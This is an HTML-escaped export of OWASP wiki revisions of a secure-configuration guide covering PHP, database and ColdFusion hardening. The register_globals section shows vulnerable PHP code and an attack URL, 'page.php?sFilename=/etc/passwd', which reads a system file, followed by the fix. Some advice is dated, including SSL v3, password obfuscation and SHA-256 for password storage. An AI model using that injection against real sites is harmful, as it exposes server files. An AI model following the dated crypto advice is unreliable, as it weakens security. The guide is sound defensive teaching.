&lt;br /&gt;
// We initialize $sFilename to an empty string&lt;br /&gt;
&lt;br /&gt;
$sFilename = '';&lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse ) { 	    &lt;br /&gt;
&lt;br /&gt;
// This is never executed:     &lt;br /&gt;
&lt;br /&gt;
$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' ) {     &lt;br /&gt;
&lt;br /&gt;
// Open $sFilename and send it's contents to the browser&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Another solution would be to have as little code as possible in global scope. Object oriented programming (OOP) is a real beauty when done right and I would highly recommend you to take that approach. We could write almost all our code in classes that is generally safer and promotes reuse. Like we never should assume that register_globals is off, we should never assume it is on. The correct way to get input from GET, POST, COOKIE etc. is to use the superglobals that were added in PHP version 4.1.0. These are the $_GET, $_POST, $_ENV, $_SERVER, $_COOKIE, $_REQUEST $_FILES, and $_SESSION arrays. The term superglobals is used since they are always available without regard to scope.&lt;br /&gt;
&lt;br /&gt;
'''register_globals '''&lt;br /&gt;
&lt;br /&gt;
If set PHP will create global variables from all user input coming from get, post and cookie. If you have the opportunity to turn off this directive you should definitely do so. Unfortunately there is so much code out there that uses it so you are lucky if you can get away with it. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''safe_mode '''&lt;br /&gt;
&lt;br /&gt;
The PHP safe mode includes a set of restrictions for PHP scripts and can really increase the security in a shared server environment. To name a few of these restrictions: A script can only access/modify files and folders which has the same owner as the script itself. Some functions/operators are completely disabled or restricted, like the backtick operator. &lt;br /&gt;
&lt;br /&gt;
'''disable_functions '''&lt;br /&gt;
&lt;br /&gt;
This directive can be used to disable functions of our choosing. &lt;br /&gt;
&lt;br /&gt;
'''open_basedir '''&lt;br /&gt;
&lt;br /&gt;
Restricts PHP so that all file operations are limited to the directory set here and its subdirectories. &lt;br /&gt;
&lt;br /&gt;
'''allow_url_fopen '''&lt;br /&gt;
&lt;br /&gt;
With this option set PHP can operate on remote files with functions like include and fopen. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''error_reporting '''&lt;br /&gt;
&lt;br /&gt;
We want to write as clean code as possible and thus we want PHP to throw all warnings, etc. at us. &lt;br /&gt;
&lt;br /&gt;
Recommended: E_ALL &lt;br /&gt;
&lt;br /&gt;
'''log_errors '''&lt;br /&gt;
&lt;br /&gt;
Logs all errors to a location specified in php.ini. &lt;br /&gt;
&lt;br /&gt;
Recommended: on &lt;br /&gt;
&lt;br /&gt;
'''display_errors '''&lt;br /&gt;
&lt;br /&gt;
With this directive set, all errors that occur during the execution of scripts, with respect to error_reporting, will be sent to the browser. This is desired in a development environment but not on a production server, since it could expose sensitive information about our code, database or web server. &lt;br /&gt;
&lt;br /&gt;
Recommended: off (production), on (development) &lt;br /&gt;
&lt;br /&gt;
'''magic_quotes_gpc '''&lt;br /&gt;
&lt;br /&gt;
Escapes all input coming in from post, get and cookie. This is something we should handle on our own. &lt;br /&gt;
&lt;br /&gt;
This also applies to '''magic_quotes_runtime'''. &lt;br /&gt;
&lt;br /&gt;
Recommended: off &lt;br /&gt;
&lt;br /&gt;
'''post_max_size, upload_max_filesize and memory_limit '''&lt;br /&gt;
&lt;br /&gt;
These directives should be set at a reasonable level to reduce the risk of resource starvation attacks.&lt;br /&gt;
&lt;br /&gt;
==Database security ==&lt;br /&gt;
&lt;br /&gt;
Data obtained from the user needs to be stored securely. In nearly every application, insufficient care is taken to ensure that data cannot be obtained from the database itself.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application connect to the database using low privilege users? &lt;br /&gt;
&lt;br /&gt;
* Are there different database connection users for application administration and normal user activities? If not, why not?&lt;br /&gt;
&lt;br /&gt;
* Does the application make use of safer constructs, such as stored procedures which do not require direct table access?&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** Is the database is on another host? Is that host locked down? &lt;br /&gt;
** All patches deployed and latest database software in use?&lt;br /&gt;
** Does the application connect to the database using an encrypted link? If not, is the application server and database server in a restricted network with minimal other hosts, particularly untrusted hosts like desktop workstations?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database using as low privilege user as is possible.&lt;br /&gt;
&lt;br /&gt;
* The application should connect to the database with different credentials for every trust distinction (e.g., user, read-only user, guest, administrators) and permissions applied to those tables and databases to prevent unauthorized access and modification.&lt;br /&gt;
&lt;br /&gt;
* The application should prefer safer constructs, such as stored procedures which do not require direct table access. Once all access is through stored procedures, access to the tables should be revoked.&lt;br /&gt;
&lt;br /&gt;
* Highly protected applications: &lt;br /&gt;
** The database should be on another host, which should be locked down with all current patches deployed and latest database software in use.&lt;br /&gt;
** The application should connect to the database using an encrypted link. If not, the application server and database server must reside in a restricted network with minimal other hosts. &lt;br /&gt;
** Do not deploy the database server in the main office network.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* ITIL – Change Management http://www.itil.org.uk/&lt;br /&gt;
&lt;br /&gt;
==ColdFusion Components (CFCs) ==&lt;br /&gt;
&lt;br /&gt;
This section provides guidance on using ColdFusion components (CFCs) without exposing your web application to unnecessary risk.  ColdFusion provides two ways of restricting access to CFCs; role-based security and access control.&lt;br /&gt;
&lt;br /&gt;
Role-based security is implemented by the '''''roles''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The attribute contains a comma-delimited list of security roles that can call this method.&lt;br /&gt;
&lt;br /&gt;
Access control is implemented by the '''''access''''' attribute of the &amp;lt;cffunction&amp;gt; tag.  The possible values of the attribute in order of most restricted behavior are: private (strongest), package, public (default), and remote (weakest).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Private:''' The method is accessible only to methods within the same component. This is similar to the Object Oriented Programming (OOP) private identifier.&lt;br /&gt;
&lt;br /&gt;
'''Package:'''  The method is accessible only to other methods within the same package. This is similar to the OOP protected static identifier.&lt;br /&gt;
&lt;br /&gt;
'''Public:''' The method is accessible to any CFC or CFM on the same server. This is similar to the OOP public static identifier.&lt;br /&gt;
&lt;br /&gt;
'''Remote:''' Allows all the privileges of public, in addition to accepting remote requests from HTML forms, Flash, or a web services. This option is required, to publish the function as a web service.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practices'''&lt;br /&gt;
&lt;br /&gt;
*Do not use THIS scope inside a component to expose properties. Use a getter or setter function instead.  For example, instead of using THIS.myVar create a public function that sets the variable (i.e. setMyVar(value)).&lt;br /&gt;
&lt;br /&gt;
*Do not omit the role attribute as ColdFusion will not restrict user access to the function.&lt;br /&gt;
&lt;br /&gt;
*Avoid using Access=”Remote” if you do not intend to call the component directly from a URL.&lt;br /&gt;
&lt;br /&gt;
==Configuration ==&lt;br /&gt;
&lt;br /&gt;
The following section describes some of the server-wide security-related options available to a ColdFusion administrator via the ColdFusion MX 7 Administrator console web application (http://servername:port/CFIDE/administrator/index.cfm). If the console application is unavailable, you can modify these options by editing the XML files in the cf_root/lib/ (Server configuration) or cf_web_root/WEB-INF/cfusion/lib (J2EE configuration) directory; however, editing these files directly is not recommended.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice '''&lt;br /&gt;
&lt;br /&gt;
*CF Admin Password screen&lt;br /&gt;
&lt;br /&gt;
*Enable a strong Administrator password&lt;br /&gt;
**'''The ColdFusion Administrator is the default interface for configuring the ColdFusion application server. It is secured by a single password. Ensure that the Administrator security is enabled and the password is strong and stored in a secure place.'''&lt;br /&gt;
**Ensure the checkbox is filled&lt;br /&gt;
**Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
**Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox Security screen'''&lt;br /&gt;
&lt;br /&gt;
Enable Sandbox Security&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''The ColdFusion Sandbox allows you to place access security restrictions on files, directories, methods, and data sources.  Sandboxes make the most sense for a hosting provider or corporate intranet where multiple applications share the same server. Enable this option.'''&lt;br /&gt;
&lt;br /&gt;
'''Next, a sandbox needs to be configured, because if not all code in all directories will execute without restriction.  Code in a directory and its subdirectories inherits the access controls defined for the sandbox.  For example, if ABC Company creates multiple applications within their directory all applications will have the same permissions as the parent.  A sandbox applied to ABC-apps will apply to app1 and app2.  A sample directory structure is shown below:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app1'''&lt;br /&gt;
&lt;br /&gt;
'''D:\inetpub\wwwroot\ABC-apps\app2'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Note: if a new sandbox is created for app2 then it will not inherit settings from ABC-apps.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Sandbox security configurations are application specific; however, there are general guidelines that should be followed:'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create a default restricted sandbox and copy setting to each subsequent sandbox removing restrictions as needed by the application.  Except in the case of files/directories where access is granted rather than restricted.&lt;br /&gt;
&lt;br /&gt;
Restrict access to data sources that should not be accessed by the sandboxed application.&lt;br /&gt;
&lt;br /&gt;
Restrict access to powerful tags, for example CFREGISTRY and CFEXECUTE.&lt;br /&gt;
&lt;br /&gt;
Restrict file and directory access to limit the ability of tags and functions to perform actions to specified paths.&lt;br /&gt;
&lt;br /&gt;
'''''Every''''' application should have a sandbox.&lt;br /&gt;
&lt;br /&gt;
In multi-homed environments disable Java Server Pages (JSP) as ColdFusion is unable to restrict the functionality of the underlying Java server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''RDS Password screen'''&lt;br /&gt;
&lt;br /&gt;
Enable a strong RDS password&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Developers can access ColdFusion resources (files and data sources) over HTTP from Macromedia Dreamweaver MX and HomeSite+ through ColdFusion’s Remote Development Services (RDS). This feature is password protected should only be enabled in secure development environments.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ensure the checkbox is filled&lt;br /&gt;
&lt;br /&gt;
Enter and confirm a strong password string of 8 characters or more&lt;br /&gt;
&lt;br /&gt;
Click Submit Changes&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use RDS over SSL - During development, you should use SSL v3 to encrypt all RDS communications between Dreamweaver MX and the ColdFusion server. This includes remote access to server data sources and drives, provided that both are accessed through RDS.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable RDS in Production&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''In production environments, you should not use RDS. In earlier versions of ColdFusion, RDS ran as a separate service or process and could be disabled by disabling the service. In ColdFusion MX, RDS is integrated into the main service. To disable it, you must disable the RDSServlet mapping in the web.xml file. The following procedure assumes that ColdFusion is installed in the default location.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''1.	Back up the C:\CFusionMX7\wwwroot\WEB-INF\web.xml file.'''&lt;br /&gt;
&lt;br /&gt;
'''2.	Open the web.xml file for editing.'''&lt;br /&gt;
&lt;br /&gt;
'''3.	Comment out the RDSServlet mapping, as follows:'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;!—'''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-mapping&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;servlet-name&amp;gt;RDSServlet&amp;lt;/servlet-name&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;url-pattern&amp;gt;/CFIDE/main/ide.cfm&amp;lt;/url-pattern&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''&amp;lt;/servlet-mapping&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''--&amp;gt; '''&lt;br /&gt;
&lt;br /&gt;
'''4.	Save the file.'''&lt;br /&gt;
&lt;br /&gt;
'''5.	Restart ColdFusion.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Settings Screen&lt;br /&gt;
&lt;br /&gt;
Enable a Request Timeout&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''ColdFusion processes requests simultaneously and queues all requests above the configured maximum number of simultaneous requests. If requests run abnormally long, this can tie up server resources and lead to DoS attacks. This setting will terminate requests when the configured timeout is reached.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Fill the checkbox next to “Timeout Request after (seconds)”&lt;br /&gt;
&lt;br /&gt;
Enter the number of seconds for ColdFusion to allow threads to run&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To allow a valid template request to run beyond the configured timeout, place a &amp;lt;cfsetting&amp;gt; atop the base ColdFusion template and configure the RequestTimeout attribute for the necessary amount of time (in seconds).'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Use UUID for cftoken&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best practice calls for J2EE session management. In the event that only ColdFusion session management is available, strong security identifiers must be used. Enable this setting to change the default 8-character CFToken security token string to a UUID.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enable Global Script Protection - This is a new security feature in ColdFusion MX 7 that isn’t available in other web application platforms. It helps protect Form, URL, CGI, and Cookie scope variables from cross-site scripting attacks. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Site-wide Error Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Prevent information leaks through verbose error messages. Specifying a site-wide error handler covers you when cftry/cfcatch are not used. This page should be a generic error message that you return to the user. Also, if the error handler displays user-input, it should be reviewed for potential cross-site scripting issues.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Specify a Missing Template Handler &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Provide a custom message page for HTTP 404 errors when the server cannot find the requested ColdFusion template.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Configure a memory throttling &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''To prevent file upload DoS attacks, Macromedia added new configuration settings to ColdFusion MX 7.0.1 that allow administrators to restrict the total upload size of HTTP POST operations. Configure these settings accordingly.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
maximum size for post data&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This is the total size that ColdFusion will accept for any single HTTP POST request (including file uploads). ColdFusion will reject any request whose Content-size header exceeds this setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Threshold &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''HTTP POST requests larger than this setting (default is 4MB) are included in the total concurrent request memory size and get queued if they exceed the Request Throttle Memory setting.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Request Throttle Memory &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''This sets the total amount of memory (MB) ColdFusion reserves for concurrent HTTP POST requests. Any requests exceeding this limit are queued until enough memory is available. '''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Memory Variables screen'''&lt;br /&gt;
&lt;br /&gt;
Enable J2EE Session Management and Use J2EE session variables.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Best practice requires J2EE sessions because they are more secure than regular ColdFusion sessions. (See Session Management section)&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable Session Variables”&lt;br /&gt;
&lt;br /&gt;
Select checkbox next to “Enable J2EE session variables”&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum session timeout to 20 minutes to limit the window of opportunity for session hijacking.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default session timeout to 20 minutes to limit the window of opportunity for session hijacking. (The default value is 20 minutes.)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The session-timeout parameter in the cf_root/WEB-INF/web.xml file establishes the maximum J2EE session timeout. This setting should always be greater-than or equal-to ColdFusion’s Maximum Session Timeout value.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the maximum application timeout to 24 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the default application timeout to 8 hours.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Data Sources screen'''&lt;br /&gt;
&lt;br /&gt;
Do not use an administrative account to connect ColdFusion to a data source. For example, do not use SA account to connect to a MS SQL Server. The account accessing the database should be granted specific privileges to the objects it needs to access. In addition, the account created to connect the database should be an OS-based, not a SQL account. Operating system accounts have many more auditing, password, and other security controls associated with them.  For example, account lockouts and password complexity requirements are built into the Windows operating system; however, a database would need custom code to handle these security-related tasks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable the following Allowed SQL options for all data sources:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Create&lt;br /&gt;
&lt;br /&gt;
Drop&lt;br /&gt;
&lt;br /&gt;
Grant&lt;br /&gt;
&lt;br /&gt;
Revoke&lt;br /&gt;
&lt;br /&gt;
Alter&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''As an administrator, you do not have control over what a developer sends to the database; however, there should be no circumstance where the previous commands need to be sent to a database from a web application.'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging Settings screen'''&lt;br /&gt;
&lt;br /&gt;
Disable Robust Exception for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Disable Debugging for production servers. (Default)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Debugging IP Addresses'''&lt;br /&gt;
&lt;br /&gt;
Ensure only the addresses of trusted clients are in the IP list.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Only allow the localhost IP (127.0.0.1) in the list on production machines&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Mail screen'''&lt;br /&gt;
&lt;br /&gt;
Require a user name and password to authenticate to your mail server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Set the connection timeout to 60 seconds (The default value is 60 seconds.)&lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity|Secure Lifecycle]]&lt;br /&gt;
[[category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59980</id>
		<title>Configuration</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59980"/>
				<updated>2009-05-03T21:36:09Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* How to identify if you are vulnerable */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To produce applications which are secure out of the box.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS6 – Manage Changes – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
Turn off all unnecessary features by default&lt;br /&gt;
&lt;br /&gt;
* Ensure that all switches and configuration for every feature is configured initially to be the safest possible choice.&lt;br /&gt;
&lt;br /&gt;
* Inspect the design to see if the less safe choices could be designed in another way. For example, password reset systems are intrinsically unsound from a security point of view. If you do not ship this component, your application’s users will be safer.&lt;br /&gt;
&lt;br /&gt;
* Do not rely on optionally installed features in the base code.&lt;br /&gt;
&lt;br /&gt;
* Do not configure anything in preparation for an optionally deployable feature.&lt;br /&gt;
&lt;br /&gt;
==Default passwords ==&lt;br /&gt;
&lt;br /&gt;
Applications often ship with well-known passwords. In a particularly excellent effort, NGS Software determined that Oracle’s “Unbreakable” database server contained 168 default passwords out of the box. Obviously, changing this many credentials every time an application server is deployed is out of the question, nor should it be necessary.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s manifest and ensure that no passwords are included in any form, whether within the source files, compiled into the code, or as part of the configuration.&lt;br /&gt;
&lt;br /&gt;
* Inspect the application for usernames and passwords. Ensure that diagrams also do not have any.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not ship the product with any configured accounts.&lt;br /&gt;
&lt;br /&gt;
* Do not hard code any backdoor accounts or special access mechanisms.&lt;br /&gt;
&lt;br /&gt;
==Secure connection strings ==&lt;br /&gt;
&lt;br /&gt;
Connection strings to the database are rarely encrypted. However, they allow a remote attacker who has shell access to perform direct operations against the database or back end systems, thus providing a leap point for total compromise. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Check your framework’s configuration file, registry settings, and any application based configuration file (usually config.php, etc) for clear text connection strings to the database.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Sometimes, no password is just as good as a clear text password.&lt;br /&gt;
&lt;br /&gt;
* On the Win32 platform, use “TrustedConnection=yes”, and create the DSN with a stored credential. The credential is stored as a LSA Secret, which is not perfect, but is better than clear text passwords.&lt;br /&gt;
&lt;br /&gt;
* Develop a method to obfuscate the password in some form, such as “encrypting” the name using the hostname or similar within code in a non-obvious way.&lt;br /&gt;
&lt;br /&gt;
* Ask the database developer to provide a library which allows remote connections using a password hash instead of a clear text credential.&lt;br /&gt;
&lt;br /&gt;
==Secure network transmission ==&lt;br /&gt;
&lt;br /&gt;
By default, no unencrypted data should transit the network. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use a packet capture tool, such as Ethereal, and mirror a switch port near the database or application servers.&lt;br /&gt;
&lt;br /&gt;
* Sniff the traffic for a while and determine your exposure to an attacker performing this exact same task.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use SSL, SSH and other forms of encryption (such as encrypted database connections) to prevent data from being intercepted or interfered with over the wire.&lt;br /&gt;
&lt;br /&gt;
==Encrypted data ==&lt;br /&gt;
&lt;br /&gt;
Some information security policies and standards require the database on-disk data to be encrypted. However, this is essentially useless if the database connection allows clear text access to the data. What is more important is the obfuscation and one-way encryption of sensitive data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications:&lt;br /&gt;
&lt;br /&gt;
* Is there a requirement to encrypt certain data?&lt;br /&gt;
&lt;br /&gt;
* If so, is it “encrypted” in such a fashion that allows a database administrator to read it without knowing the key?&lt;br /&gt;
&lt;br /&gt;
If so, the “encryption” is useless and another approach is required.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications and any application that has a requirement to encrypt data:&lt;br /&gt;
&lt;br /&gt;
* Passwords should only be stored in a non-reversible format, such as SHA-256 or similar&lt;br /&gt;
&lt;br /&gt;
* Sensitive data like credit cards should be carefully considered – do they have to be stored at all? '''The PCI guidelines are very strict''' '''on the storage of credit card data'''. '''We strongly recommend against it. '''&lt;br /&gt;
&lt;br /&gt;
* Encrypted data should not have the key on the database server. &lt;br /&gt;
&lt;br /&gt;
The last requirement requires the attacker to take control of two machines to bulk decrypt data. The encryption key should be able to be changed on a regular basis, and the algorithm should be sufficient to protect the data in a temporal timeframe. For example, there is no point in using 40 bit DES today; data should be encrypted using AES-128 or better.&lt;br /&gt;
&lt;br /&gt;
==PHP Configuration ==&lt;br /&gt;
&lt;br /&gt;
==Global variables  ==&lt;br /&gt;
&lt;br /&gt;
	Variables declared outside of functions are considered global by PHP. The opposite is that a variable declared inside a function, is considered to be in local function scope. PHP handles global variables quite differently than languages like C. In C, a global variable is always available in local scope as well as global, as long as it is not overridden by a local definition. In PHP things are different; to access a global variable from local scope you have to declare it global in that scope. The following example shows this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sTitle = 'Page title'; // Global scope&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function printTitle()&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
global $sTitle; // Declare the variable as global&lt;br /&gt;
&lt;br /&gt;
	echo $sTitle; // Now we can access it just like it was a local variable&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	All variables in PHP are represented by a dollar sign followed by the name of the variable. The names are case-sensitive and must start with a letter or underscore, followed by any number of letters, numbers, or underscores.&lt;br /&gt;
&lt;br /&gt;
==register_globals ==&lt;br /&gt;
&lt;br /&gt;
The register_globals directive makes input from GET, POST and COOKIE, as well as session variables and uploaded files, directly accessible as global variables in PHP. This single directive, if set in php.ini, is the root of many vulnerabilities in web applications. 	 &lt;br /&gt;
&lt;br /&gt;
Let's start by having a look at an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ($bIsAlwaysFalse) &lt;br /&gt;
&lt;br /&gt;
{ &lt;br /&gt;
&lt;br /&gt;
	// This is never executed:&lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}''&lt;br /&gt;
&lt;br /&gt;
//       ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )   &lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send it's contents to the browser  &lt;br /&gt;
&lt;br /&gt;
	//		... &lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
If we were to call this page like: '''''page.php?sFilename=/etc/passwd''''' with register_globals set, it would be the same as to write the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sFilename = '/etc/passwd'; // This is done internally by PHP       &lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse )&lt;br /&gt;
&lt;br /&gt;
{       // This is never executed:         &lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send it's contents to the browser&lt;br /&gt;
&lt;br /&gt;
	// ...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PHP takes care of the '''''$sFilename = '/etc/passwd';''''' part for us. What this means is that a malicious user could inject his/her own value for $sFilename and view any file readable under the current security context. &lt;br /&gt;
&lt;br /&gt;
We should always think of that “what if” when writing code. So turning off register_globals might be a solution but what if our code ends up on a server with register_globals on. We must bear in mind that all variables in global scope could have been tampered with. The correct way to write the above code would be to make sure that we always assign a value to '''''$sFilename''''': &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// We initialize $sFilename to an empty string&lt;br /&gt;
&lt;br /&gt;
$sFilename = '';&lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse ) { 	    &lt;br /&gt;
&lt;br /&gt;
// This is never executed:     &lt;br /&gt;
&lt;br /&gt;
$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' ) {     &lt;br /&gt;
&lt;br /&gt;
// Open $sFilename and send it's contents to the browser&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
